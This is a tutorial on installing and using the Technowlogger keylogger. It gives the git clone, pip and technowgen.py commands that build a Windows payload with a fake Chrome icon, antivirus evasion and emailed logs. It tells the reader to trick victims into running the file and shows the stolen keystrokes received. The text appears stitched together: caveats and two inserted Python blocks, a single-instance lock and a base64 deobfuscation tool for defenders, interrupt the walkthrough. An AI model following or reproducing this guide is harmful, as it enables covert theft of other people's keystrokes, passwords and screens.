Overview of keyloggers and Technowlogger
A keylogger is malware that records what a user types on a device and delivers it to an attacker. Technowlogger is one example. Over the years, attackers have refined their keyloggers so that antivirus products miss them and users are easily persuaded to install them; as discussed in earlier guides, social engineering is the usual way a keylogger is delivered to and installed on a victim's machine.
Technowlogger is an example of such a tool. It was written for educational purposes and is hosted on GitHub. It has the features found in the keyloggers that black hat hackers use in their operations. Some of its features include:
- Payloads work on both Windows and Linux.
- Technowlogger obfuscates the payload before building it, which lets it slip past some (not all) antivirus products.
- Email notification when a new victim comes online.
- Sends screenshots of the victim's screen by email.
- From a Linux machine the attacker can build payloads for both Windows and Linux; from a Windows machine only a Windows executable can be built.
- Retrieves saved passwords from the victim's system and sends them to the attacker.
- Claimed to be undetected by antivirus programs; in practice detection depends on the product and its signatures, as the obfuscation item above already admits.
- The keylogger is persistent across reboots.
- Technowlogger builds a single executable with no runtime dependencies.
- Log data is separated by active window name, so the attacker can tell which application the keystrokes were typed into.
- A custom icon can be added to the malicious file.
- The payload is about 5 MB and carries the full functionality listed here.
- The generated payload is base64-encoded. Note that base64 is an encoding, not encryption or obfuscation in any strong sense: it hides strings from naive string matching but is reversed in one call and gives no real protection against reverse engineering.
- A function that kills antivirus processes on the victim's PC and tries to disable its security.
- A colourful interactive interface for generating the payload.
- On the attacker's side, the generator script detects missing dependencies and installs them automatically.
- A built-in binder that attaches the keylogger to any file (.pdf, .txt, .exe, etc.), so the legitimate file opens in the foreground while the malicious code runs in the background as a service.
- Checks for an already running instance on the system; if one is found, only the legitimate file is executed. Multiple instances are prohibited so that the same logs are not emailed several times.
In this guide we will install technowlogger and use it to generate a payload for Windows. You will need:
- A PC running Windows.
- Python installed.
- Basic familiarity with the Windows command prompt (CMD).
Step 1: Download technowlogger from GitHub
To install the tool on our Windows machine we clone its GitHub repository with the command below. You can also download the repository as a zip file instead.
git clone https://github.com/PushpenderIndia/technowlogger.git
Step 2: Setup technowlogger and install dependencies
After downloading technowlogger, we change into its directory and install the remaining dependencies.
Move into the technowlogger directory:
cd technowlogger
Install the dependencies:
python -m pip install -r requirements.txt
Step 3: Generating a keylogger
Technowlogger takes a number of required and optional arguments when generating a payload. These include options to bind the payload to a legitimate-looking file, the email address and password that logs are sent to, and a custom icon for the file. For this guide we generate the payload with the command shown below.
python technowgen.py -e firstname.lastname@example.org -p yourpassword -w -o book --icon icon/chrome.ico
In the command above, technowgen.py is the generator script. We pass the email address the logs go to (-e firstname.lastname@example.org) and its password (-p yourpassword), select Windows as the target platform (-w), name the output file book (-o book), and choose the icon shown on the file (--icon icon/chrome.ico). Be aware that the mailbox password is embedded in the payload, so anyone who recovers it from the executable can read that mailbox; use a dedicated account. At this step you also need some social engineering to lure the victim into opening the payload.
The generated payload is written to the dist folder inside the technowlogger directory, as shown above.
Step 4: Install on target system and receive logs
To install the generated keylogger on the target machine we only need to deliver it to the victim and get them to run it. Once executed, the keylogger first checks whether another instance of the technowlogger keylogger is already running. If one is found, only the legitimate part of the file is executed, so the keylogger is not installed twice and the same logs are not received twice.
As the image above shows, the payload generated with technowlogger was not flagged as malicious by the antivirus product on the test machine, and it looks like a legitimate file. Keep in mind that detection varies between products and changes as signatures are updated, so this evasion is not guaranteed. A victim who downloads the file is easily fooled into opening it.
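The "already running instance" check described in the feature list and again in Step 4 is a standard single-instance guard. The block below is an added example of that technique, not technowlogger's own code: it claims a lock file opened with O_CREAT|O_EXCL (atomic on both Windows and POSIX), refuses to start if the recorded PID belongs to a live process, and reclaims a lock left behind by a process that has died. The lock path and the PID-liveness probe are this example's own assumptions.

```python
"""Single-instance guard (added example; not part of technowlogger).

A second copy of the program calls acquire_instance_lock() and gets False,
which is the point at which a binder would run only the legitimate file.
"""
import errno
import os
import tempfile
from typing import Optional, Tuple

# Assumed location; a real program would pick a per-user path.
LOCK_PATH = os.path.join(tempfile.gettempdir(), "example-instance.lock")


def _pid_alive(pid: int) -> bool:
    """Best-effort check whether a process with this PID exists."""
    if pid <= 0:
        return False
    if os.name == "nt":
        import ctypes  # Windows: try to open a handle to the process
        PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
        handle = ctypes.windll.kernel32.OpenProcess(
            PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
        if not handle:
            return False  # no such process (or access denied; treated as dead)
        ctypes.windll.kernel32.CloseHandle(handle)
        return True
    try:
        os.kill(pid, 0)  # POSIX: signal 0 only checks existence
    except OSError as exc:
        return exc.errno == errno.EPERM  # exists but owned by someone else
    return True


def acquire_instance_lock(path: str = LOCK_PATH, pid: Optional[int] = None) -> bool:
    """Return True if this process now holds the lock, False if a live instance does.

    A lock file whose recorded PID no longer exists is treated as stale,
    removed, and re-acquired. `pid` is overridable only so the guard can be
    exercised from one process in demo().
    """
    pid = os.getpid() if pid is None else pid
    for _ in range(2):  # at most one retry after removing a stale lock
        try:
            fd = os.open(path, os.O_CREAT | os.O_EXCL | os.O_WRONLY)
        except FileExistsError:
            try:
                with open(path) as f:
                    owner = int(f.read().strip() or 0)
            except (OSError, ValueError):
                owner = 0
            if owner and owner != pid and _pid_alive(owner):
                return False  # another live instance holds the lock
            try:
                os.remove(path)  # stale or unreadable lock: reclaim it
            except FileNotFoundError:
                pass
            continue
        with os.fdopen(fd, "w") as f:
            f.write(str(pid))
        return True
    return False


def demo(path: Optional[str] = None) -> Tuple[bool, bool, bool]:
    """Exercise the guard: first start, refused second start, reclaimed stale lock."""
    path = path or os.path.join(tempfile.gettempdir(), f"example-instance-{os.getpid()}.lock")
    if os.path.exists(path):
        os.remove(path)
    first = acquire_instance_lock(path)                        # True: nobody held it
    second = acquire_instance_lock(path, pid=os.getpid() + 1)  # False: held by a live process (us)
    with open(path, "w") as f:
        f.write("2147483647")  # simulate a lock left by a process that no longer exists
    reclaimed = acquire_instance_lock(path)                    # True: stale lock replaced
    os.remove(path)
    return first, second, reclaimed


if __name__ == "__main__":
    print(demo())
```

The O_EXCL open is what makes the check race-free: two copies started at the same instant cannot both create the file. A lock file is also a cheap detection artifact for defenders, since a fixed path in a temp directory is easy to hunt for.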
Step 5: Receiving logs
When the victim executes the keylogger, we receive his or her logs at the email address we provided while creating the payload. I ran the malicious file we had generated earlier on Windows 10, and below is an example of the technowlogger reports I received.
As you can see, we were able to receive the operating system and its version as well as the keys entered by our victim. The logs are then sent regularly, at the interval you set while generating the payload.
Keyloggers are among the most common kinds of malware affecting people around the world, used both in targeted attacks and in mass campaigns against individuals. Technowlogger makes building one easy by bundling the essential components into a single tool. It also obfuscates the generated payload to hinder analysis and to get past some antivirus products; as noted above, the base64 encoding it applies is trivially reversible, so it should not be mistaken for real protection against reverse engineering.
As much as antivirus vendors try to detect as many malware variants as possible, some samples will still run undetected on a victim's machine, and technowlogger is an example of a tool that can produce such samples. It is each person's responsibility to verify the authenticity of a file before running it: obtain software from the official source, check the publisher's digital signature or the published hash, and treat unexpected attachments with suspicion.
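To make the base64 point concrete for both the feature list and this conclusion, here is an added example (not technowlogger's own code) of the analysis a defender does on a base64-wrapped Python stub: it peels nested `exec(base64.b64decode(...))` layers until plain source appears, then reports indicators such as mail and keyboard-hook modules and any email address in the recovered source. The sample stub, its three wrapping layers, and the address and password inside it are constructed for this example.

```python
"""Peel base64 layers off a Python stager (added example; not technowlogger's code).

Shows why base64 is an encoding, not protection: the innermost source, with
its SMTP credentials, is recovered by repeated decoding.
"""
import base64
import re
from typing import Dict, List, Tuple

# Matches the one-liner an encoder typically emits: b64decode(b'....') or
# b64decode('....'), with whitespace tolerated inside the literal.
_STUB = re.compile(rb"b64decode\(\s*b?['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")

# Strings a keylogger stub commonly needs; "@" catches a hard-coded mailbox.
INDICATORS = (b"smtplib", b"pynput", b"keyboard", b"ImageGrab", b"@")


def peel_base64_layers(blob: bytes, max_layers: int = 16) -> Tuple[bytes, int]:
    """Return (innermost plaintext, number of layers removed)."""
    layers = 0
    while layers < max_layers:
        match = _STUB.search(blob)
        if not match:
            break  # no further decode-and-exec wrapper: this is the real source
        try:
            encoded = re.sub(rb"\s+", b"", match.group(1))
            blob = base64.b64decode(encoded, validate=True)
        except ValueError:
            break  # not valid base64 after all; stop rather than guess
        layers += 1
    return blob, layers


def triage(blob: bytes) -> Dict[str, object]:
    """Decode all layers and summarise what the recovered source contains."""
    plain, layers = peel_base64_layers(blob)
    found: List[str] = [i.decode() for i in INDICATORS if i in plain]
    emails = [e.decode() for e in re.findall(rb"[\w.+-]+@[\w-]+\.[\w.]+", plain)]
    return {"layers": layers, "indicators": found, "emails": emails}


def wrap(src: bytes, layers: int) -> bytes:
    """Build a stub the way a simple encoder would, for the constructed sample."""
    for _ in range(layers):
        src = b"import base64\nexec(base64.b64decode(b'" + base64.b64encode(src) + b"'))\n"
    return src


# Constructed sample: the kind of source a keylogger stub hides. Placeholder credentials.
SAMPLE_SOURCE = b"""import smtplib
from pynput import keyboard
EMAIL = 'attacker@example.org'
PASSWORD = 'hunter2'
"""
SAMPLE_STUB = wrap(SAMPLE_SOURCE, 3)

if __name__ == "__main__":
    print(triage(SAMPLE_STUB))
```

Run against the constructed stub, `triage` reports three layers removed and surfaces the mail module, the keyboard hook and the hard-coded mailbox. The same loop works on a stub pulled out of a compiled bundle once the Python source has been extracted from it; `max_layers` is a guard against a stub that decodes to itself forever.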